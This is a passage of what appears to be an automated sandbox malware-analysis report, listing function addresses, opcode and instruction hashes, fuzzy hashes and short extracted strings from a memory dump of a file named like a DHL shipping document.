                                                • Opcode ID: 46f4e7bc8561bc85cae1d8855d0f7426622c8518e10f6f6b03e574be844e4a02
                                                • Instruction ID: 27d899063256c7540bf36e06e98923fd4cdc1ed7e4f4439f1ea706290bf8a08f
                                                • Opcode Fuzzy Hash: 46f4e7bc8561bc85cae1d8855d0f7426622c8518e10f6f6b03e574be844e4a02
                                                • Instruction Fuzzy Hash: 3D22C651B19A494FF786AB7C84657B9BBD2EF8A310F0481BAD04DC72C3DD28AC5583C1
                                                Function 00007FFAACCD1E38 Relevance: 1.9, Strings: 1, Instructions: 694COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: kBM_^
                                                • API String ID: 0-1509302871
                                                • Opcode ID: 1a6c41122d2884adea93b11dc89f1cc068e391ed3537be4fa3bd0708a68e7db7
                                                • Instruction ID: c90f4e4a09e4dc456cab40fd7eef5c943f66e681c3d89de2ef21e8ef01958c2d
                                                • Opcode Fuzzy Hash: 1a6c41122d2884adea93b11dc89f1cc068e391ed3537be4fa3bd0708a68e7db7
                                                • Instruction Fuzzy Hash: 6722A451B1994A4FF78AAB7C84667B9B7D2EF8A310F0481BAD04DC72C7DD28AC4583C1
                                                Function 00007FFAACCD1E50 Relevance: 1.9, Strings: 1, Instructions: 685COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: kBM_^
                                                • API String ID: 0-1509302871
                                                • Opcode ID: 6a9a6abf6f365f8927fe5c521a3dc17c0d5fe01cebc07b5feb6f9cf1d196abae
                                                • Instruction ID: 830b7c9721dc6c86a8a1edd4ead78b303d59a69f03a993c8dd94fab3ca1c7ece
                                                • Opcode Fuzzy Hash: 6a9a6abf6f365f8927fe5c521a3dc17c0d5fe01cebc07b5feb6f9cf1d196abae
                                                • Instruction Fuzzy Hash: 5612A451B199494FF78AAB7C84667B9B7D2EF8A310F0481BAD04DC72C7DD28AC4583C1
                                                Function 00007FFAACCD1E58 Relevance: 1.9, Strings: 1, Instructions: 681COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: kBM_^
                                                • API String ID: 0-1509302871
                                                • Opcode ID: 98e04977e5d1294dc044b0079a60fe8d1e9b13b86ab4be1680366128c732f3d8
                                                • Instruction ID: 9f17aa06d3cbf4922ddb48d2c9457e16c617836b512183c2e8d40e3b29f72ddb
                                                • Opcode Fuzzy Hash: 98e04977e5d1294dc044b0079a60fe8d1e9b13b86ab4be1680366128c732f3d8
                                                • Instruction Fuzzy Hash: 8412A451B19A494FF78AAB7C84667B9A7D2EF8A310F0481BAD04DC72C7DD28AC4587C1
                                                Function 00007FFAACCD1E88 Relevance: 1.9, Strings: 1, Instructions: 657COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: kBM_^
                                                • API String ID: 0-1509302871
                                                • Opcode ID: 1e9b2068065de4e1817d33aa9096dd39dd445c0aa944e312ae018ea5c9515f82
                                                • Instruction ID: 5313161d120165da247d84607f9cfdee642b400b41ed35c884be44ee653a8fd7
                                                • Opcode Fuzzy Hash: 1e9b2068065de4e1817d33aa9096dd39dd445c0aa944e312ae018ea5c9515f82
                                                • Instruction Fuzzy Hash: B012B651B299494FF78AAB3C84667B9B6D2EF8A310F0481BAD04DC72C7DD28EC4587C1
                                                Function 00007FFAACCD08A5 Relevance: 1.6, Instructions: 1629COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d4834f1ed2b46f2fe2cfb8c6e2499225406ea9f52a69ead0e77ce1108389b4eb
                                                • Instruction ID: e2cb6af917770f09894b1e67afbe26d981ef4dc0d59c725904e9bbcaf8084ce2
                                                • Opcode Fuzzy Hash: d4834f1ed2b46f2fe2cfb8c6e2499225406ea9f52a69ead0e77ce1108389b4eb
                                                • Instruction Fuzzy Hash: A3C2547061DB859FE70A9B2CD420A64BBB1EF5B340F9401EFE149CB2D3CE59A848C756
                                                Function 00007FFAACCD3E60 Relevance: 1.2, Instructions: 1221COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 12652de3e33b8a0d2ddb16018ac4365c83f0cb09aeb00474d679aaa75c9c1792
                                                • Instruction ID: 1ebe2817d362b2a632ce5b993037ba0895307d41255acc4a3e0a9201ccad0588
                                                • Opcode Fuzzy Hash: 12652de3e33b8a0d2ddb16018ac4365c83f0cb09aeb00474d679aaa75c9c1792
                                                • Instruction Fuzzy Hash: 34924D70A1DB858BE778DF18C4856AAB7E1FF99704F10867DD48D83291DE34E8468BC2
                                                Function 00007FFAACCFF778 Relevance: 1.2, Instructions: 1180COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f3c959a6065e2453fb06e7df40c722c35d8c8f7c35992be02c461f17ddd01def
                                                • Instruction ID: 5c0f98f434c132ce3727222f14ae93a5529534c312981292d3f4c31cd9c0a06a
                                                • Opcode Fuzzy Hash: f3c959a6065e2453fb06e7df40c722c35d8c8f7c35992be02c461f17ddd01def
                                                • Instruction Fuzzy Hash: 7482B27161CB0A8FEB98EB28C091AB5B3E1FF95304B5485B9D05EC3696CE25F84687C1
                                                Function 00007FFAACCEE720 Relevance: 9.4, Strings: 7, Instructions: 649COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0#%$0#%$0X%$0X%$TK_H$x!%$x!%
                                                • API String ID: 0-2690091912
                                                • Opcode ID: 84842414a575661af06b68b4fef751e69590a67d56247b63d56b3c8de89ae79c
                                                • Instruction ID: 5b2001b2e4538c8c0ec4cb3c8512d0e4e4e8778698b112231443ea938db5da75
                                                • Opcode Fuzzy Hash: 84842414a575661af06b68b4fef751e69590a67d56247b63d56b3c8de89ae79c
                                                • Instruction Fuzzy Hash: D9127D307199098FEBD4EB2CC498B6477D2FFAA34074541FAE45EC72A6DE24EC498781
                                                Function 00007FFAACCD31E5 Relevance: 9.2, Strings: 7, Instructions: 442COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0#%$0#%$0X%$0X%$TK_H$x!%$x!%
                                                • API String ID: 0-2690091912
                                                • Opcode ID: af9fae4cde61925e6221b08a47fa7979109e0af94d015d757075145d56225009
                                                • Instruction ID: 401d8c5674076bb3ed3f1d72f47c7069f6b15ef1fbd2246087515bd498c69de1
                                                • Opcode Fuzzy Hash: af9fae4cde61925e6221b08a47fa7979109e0af94d015d757075145d56225009
                                                • Instruction Fuzzy Hash: D5C1B030719D0A8FEBA8EF2CC458A7537D2FF9A340B0541B9E41EC72A6DE24EC458781
                                                Function 00007FFAACCEC280 Relevance: 2.8, Strings: 2, Instructions: 314COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0#%$x!%
                                                • API String ID: 0-683446285
                                                • Opcode ID: ed7355c4ec31c43bac6e4f36e3189aa0ba106e766713d0a1654a0734ea21eb5c
                                                • Instruction ID: 1bdb95dbf755f54597db2adab5503092272adae7489fa5008d92f96a560b618c
                                                • Opcode Fuzzy Hash: ed7355c4ec31c43bac6e4f36e3189aa0ba106e766713d0a1654a0734ea21eb5c
                                                • Instruction Fuzzy Hash: 6AA1A171A1DA498FFB95DF6C9855AB83BE1FF9A300B0940B9D44DC7292CF25EC058781
                                                Function 00007FFAACCD31E0 Relevance: 2.7, Strings: 2, Instructions: 198COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0#%$x!%
                                                • API String ID: 0-683446285
                                                • Opcode ID: 2c721d8d380ddecf3ef9cdcef83809fe466f32b28bd8c837b13f6ed75780acac
                                                • Instruction ID: 13d27f1b21a12c37f65d629f39eeb49c64cdcb06c5b4e46c15d989de7af03c3d
                                                • Opcode Fuzzy Hash: 2c721d8d380ddecf3ef9cdcef83809fe466f32b28bd8c837b13f6ed75780acac
                                                • Instruction Fuzzy Hash: F951A33171DA098FF658EF2CA85697533D1EF9A320B1441BAE44EC32A3DE25EC4683C1
                                                Function 00007FFAACCE44E0 Relevance: 1.8, Strings: 1, Instructions: 572COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: d
                                                • API String ID: 0-2564639436
                                                • Opcode ID: 3cbd0e4a6d084875bf0f24bcdef71e27fb62354ab769a76338430b3fc1936361
                                                • Instruction ID: bbbc4bfe621d6df04a43a2de7084baa51a6b217ff279e0b9421688e35f976392
                                                • Opcode Fuzzy Hash: 3cbd0e4a6d084875bf0f24bcdef71e27fb62354ab769a76338430b3fc1936361
                                                • Instruction Fuzzy Hash: E2029E70618B498FE768DF18C485A65B3E1FF96310F14866ED08EC3696DF35E846CB81
                                                Function 00007FFAACCE2120 Relevance: 1.8, Strings: 1, Instructions: 531COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0#%
                                                • API String ID: 0-3812812541
                                                • Opcode ID: d16cb0a13a9273881d727b93bdd1c78ee25de13567b67e1fa25299884305e205
                                                • Instruction ID: f3d1a163e6fddb43d55b7a472dfcb2074b33c82471097c5bedc09dd0c584ffd3
                                                • Opcode Fuzzy Hash: d16cb0a13a9273881d727b93bdd1c78ee25de13567b67e1fa25299884305e205
                                                • Instruction Fuzzy Hash: 89F1D071A1DA4A8FF798EF2C844577577E1EF9A310F0441BAE44EC3296EE24E84687C1
                                                Function 00007FFAACCD3080 Relevance: 1.8, Strings: 1, Instructions: 510COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: H
                                                • API String ID: 0-2852464175
                                                • Opcode ID: 1d669feddea85f3b26d79d3462dfc7c5f7f1415b3ef6d6db9076d17e86dd7672
                                                • Instruction ID: f345423be44563890a665269f0d09f677a6bda7ab72580b62c51e58176294eb2
                                                • Opcode Fuzzy Hash: 1d669feddea85f3b26d79d3462dfc7c5f7f1415b3ef6d6db9076d17e86dd7672
                                                • Instruction Fuzzy Hash: CDE12230A1EA0A8FF7A8AB2C946567577D1EF87310F1442BED40DC7297DE29EC468385
                                                Function 00007FFAACCE2A80 Relevance: 1.6, Strings: 1, Instructions: 398COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0p%
                                                • API String ID: 0-2377676308
                                                • Opcode ID: d18db1f2e6c728a93cecedc70bb58e7095606812bae269f8b54428ae8d9aed84
                                                • Instruction ID: b756beb8c07ea10c3868958ca3a29cf79f5da01d028f78cb6e07979b184c3cfd
                                                • Opcode Fuzzy Hash: d18db1f2e6c728a93cecedc70bb58e7095606812bae269f8b54428ae8d9aed84
                                                • Instruction Fuzzy Hash: CBB1BC20B1990A8FEBA5EF2C9458B7577E1FF9A311B1441FAE00DC72A6DE28DC45C781
                                                Function 00007FFAACCD47DD Relevance: 1.6, Strings: 1, Instructions: 376COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: L
                                                • API String ID: 0-2909332022
                                                • Opcode ID: 975a365eaf4fc4e1d3deab244aa78f36fd50dd9d929dce5a88a192a7cf1d1ee6
                                                • Instruction ID: 1cb880539cb542fcb5c8b2e48027b9a65fdbe73d386d488c900c3b2737da6c8d
                                                • Opcode Fuzzy Hash: 975a365eaf4fc4e1d3deab244aa78f36fd50dd9d929dce5a88a192a7cf1d1ee6
                                                • Instruction Fuzzy Hash: 7D916B9370C9564FE615B7BCF84AAF93B80DF8637170841B7D14DC7193DE08A84A82DA
                                                Function 00007FFAACCD1C48 Relevance: 1.6, Strings: 1, Instructions: 361COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: L
                                                • API String ID: 0-2909332022
                                                • Opcode ID: c3ccc5acee54aa6f7d49d71dd7409adf94c3624a2f734e41d2e73d127abb76a7
                                                • Instruction ID: e92991cf2d70254464e4df59f39822c8727cd96e0ec335673833a67ac38024bd
                                                • Opcode Fuzzy Hash: c3ccc5acee54aa6f7d49d71dd7409adf94c3624a2f734e41d2e73d127abb76a7
                                                • Instruction Fuzzy Hash: 0FA139B1A1CB8A8FF7599B2894555B87FD1DF97700B0541BEE04ED35D3CE25E80A8382
                                                Function 00007FFAACCDAEF2 Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @K_H
                                                • API String ID: 0-2210098489
                                                • Opcode ID: a9406d50a7c82519d94997d42084b4abf434ada033379ec369d3a808288a5214
                                                • Instruction ID: d84883662a24cb3c621cee114e6a52d1b36b266945df58c44bcb80dfd9134558
                                                • Opcode Fuzzy Hash: a9406d50a7c82519d94997d42084b4abf434ada033379ec369d3a808288a5214
                                                • Instruction Fuzzy Hash: 9191E771B1D90A8FEB54EB2CD4859B5B3D1EF9A310B1482BAD05EC7296DF24EC4687C0
                                                Function 00007FFAACCF2C90 Relevance: 1.3, Strings: 1, Instructions: 99COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 8
                                                • API String ID: 0-1379460269
                                                • Opcode ID: af8ff001f0f67337d89763b846695a4ce7397b03caf9110a5c043901ce7d22db
                                                • Instruction ID: 027a6eb051be22a04132727db85769ce254eb919ba68c3f47949c203045d9f6c
                                                • Opcode Fuzzy Hash: af8ff001f0f67337d89763b846695a4ce7397b03caf9110a5c043901ce7d22db
                                                • Instruction Fuzzy Hash: 3721C7B1A2CA414FE74CA62C9456ABAB7D0EF99310F4044AEF09EC3697DD65E8064382
                                                Function 00007FFAACCD8CA8 Relevance: 1.3, Strings: 1, Instructions: 92COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: t%
                                                • API String ID: 0-1887565827
                                                • Opcode ID: 2f88967fff191825579a5b43f4bc9c92a21de267ebe1c44fb7a2772a762aa80a
                                                • Instruction ID: 80db12687ba9390d8686e418fc0cd923a36325ef490a0e41284947354e129e71
                                                • Opcode Fuzzy Hash: 2f88967fff191825579a5b43f4bc9c92a21de267ebe1c44fb7a2772a762aa80a
                                                • Instruction Fuzzy Hash: 87212862E0AA4E8FF686DF6C98497B177D0FF99210B44407BD90DC3192DE29A92583C4
                                                Function 00007FFAACCFC808 Relevance: 1.3, Strings: 1, Instructions: 32COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: {J_^
                                                • API String ID: 0-1367854591
                                                • Opcode ID: 3d7ead964b3e7b18fd5c1b88ecfc92936fde6164a588360b45cfd1fc2e8e1695
                                                • Instruction ID: b3b77b70b5acee1c5eb19717c72aa4495ce8d9eb0b1000df1af1e25125fe2f01
                                                • Opcode Fuzzy Hash: 3d7ead964b3e7b18fd5c1b88ecfc92936fde6164a588360b45cfd1fc2e8e1695
                                                • Instruction Fuzzy Hash: F2F030DA94E1A218E61177BCB45A8F92F914F02239B08A1F7E1CC4D1A38F48608E86CD
                                                Function 00007FFAACCD31A0 Relevance: .8, Instructions: 834COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1c2b6212f8ebc746d3aac11c631f369ddd59aff7b42e68cd669aa8e39a59469b
                                                • Instruction ID: 79a52fc5abcf8067f66324ae354cd8fed296d4fee77192a54d1412e4d40d3bea
                                                • Opcode Fuzzy Hash: 1c2b6212f8ebc746d3aac11c631f369ddd59aff7b42e68cd669aa8e39a59469b
                                                • Instruction Fuzzy Hash: AA426C70619A498FEBA5EF2CC454B6577E1FF5A300F0841FAD44ECB2A6DE24EC498781
                                                Function 00007FFAACCF2408 Relevance: .7, Instructions: 733COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: adb3e0f2d4af696ea545408ed6bb1e28d3c1ee2344920102b58e25ddfd4119d8
                                                • Instruction ID: 4f968185e71e84e99b303548a2fc864d0b0eb62ed31126b1f39aa4c7b2ab5092
                                                • Opcode Fuzzy Hash: adb3e0f2d4af696ea545408ed6bb1e28d3c1ee2344920102b58e25ddfd4119d8
                                                • Instruction Fuzzy Hash: 48220771A19B0A8FEB99EF2CC4956B577E1FF99314B0441BAD00EC7296DE24EC4687C0
                                                Function 00007FFAACD04458 Relevance: .7, Instructions: 682COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2812b70848d6ebeb3d4b3209a22c1d73f37e052f4a7ae5ac4b30a3dc098464c1
                                                • Instruction ID: 3b42833d88a24958eb6d595469ca87a5415b7f00a10f5c1ebe99e463fa7f4f67
                                                • Opcode Fuzzy Hash: 2812b70848d6ebeb3d4b3209a22c1d73f37e052f4a7ae5ac4b30a3dc098464c1
                                                • Instruction Fuzzy Hash: F7221760A0DB858FE7469B2C88556657BE1EF57300B1941FFD09ECB1D3DE28E84AC392
                                                Function 00007FFAACCD4DDD Relevance: .7, Instructions: 651COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bcf75fdf8ce14544b51ec2da61af47fdc6097ebd7025039b2d4fb736a8191a65
                                                • Instruction ID: c68538a9c2dd2718d8ac6c0b8c1cd200957093a32edb9b6a186f764b6878d71b
                                                • Opcode Fuzzy Hash: bcf75fdf8ce14544b51ec2da61af47fdc6097ebd7025039b2d4fb736a8191a65
                                                • Instruction Fuzzy Hash: 0822D770E19A4A8FE796DB6CC4957B9BBB1EF56300F1441BAD00DC7287CD38E8468792
                                                Function 00007FFAACCD9558 Relevance: .6, Instructions: 616COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8800f3e65520590cb04c6407fcf76bbeb5c4c846fa5c2c0ba891639e10599f17
                                                • Instruction ID: be58a7514375fa619e396caab642ff58e71ad357dcba68f2e61879fe0090c6a3
                                                • Opcode Fuzzy Hash: 8800f3e65520590cb04c6407fcf76bbeb5c4c846fa5c2c0ba891639e10599f17
                                                • Instruction Fuzzy Hash: 97122F7190EB468FE329DF28C851571B7E0FF42310B1486BED09EC7593DA29F8468785
                                                Function 00007FFAACCD0790 Relevance: .5, Instructions: 497COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 29c0a3060d5f9b57c7166bce221f866133db781a1ff0495cc652c3b71e27f5ee
                                                • Instruction ID: 2cbf07e5e787e1f2f94c9854793781aaa37546bda25f39bc250679cdc5f0b271
                                                • Opcode Fuzzy Hash: 29c0a3060d5f9b57c7166bce221f866133db781a1ff0495cc652c3b71e27f5ee
                                                • Instruction Fuzzy Hash: 68D18662A1DA4A8FF79E9B2888566707BD1EF67310B0441BED48EC7193ED19EC4783C1
                                                Function 00007FFAACCFE6D0 Relevance: .5, Instructions: 458COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8862115a018116f7743df4783f9592250acfd35b13ac84743ca6523192ccbc50
                                                • Instruction ID: fe80b2be05079f03b357ddc2222b7deb138261a3a5543438269fcf0675914cb0
                                                • Opcode Fuzzy Hash: 8862115a018116f7743df4783f9592250acfd35b13ac84743ca6523192ccbc50
                                                • Instruction Fuzzy Hash: FCE1CE31A1DB4A8FF7A8DB1C84547B677D2EF96318F14857EC05EC7292DA28E84983C1
                                                Function 00007FFAACCD9580 Relevance: .4, Instructions: 440COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e5dff602abcbd4771620994f4d536322876131d33076e5374acf8a92107a9aee
                                                • Instruction ID: 4cc9a3bc270ab76bc9f64729062f6100327883b0b2b7d9cab986b4fea8ae0a75
                                                • Opcode Fuzzy Hash: e5dff602abcbd4771620994f4d536322876131d33076e5374acf8a92107a9aee
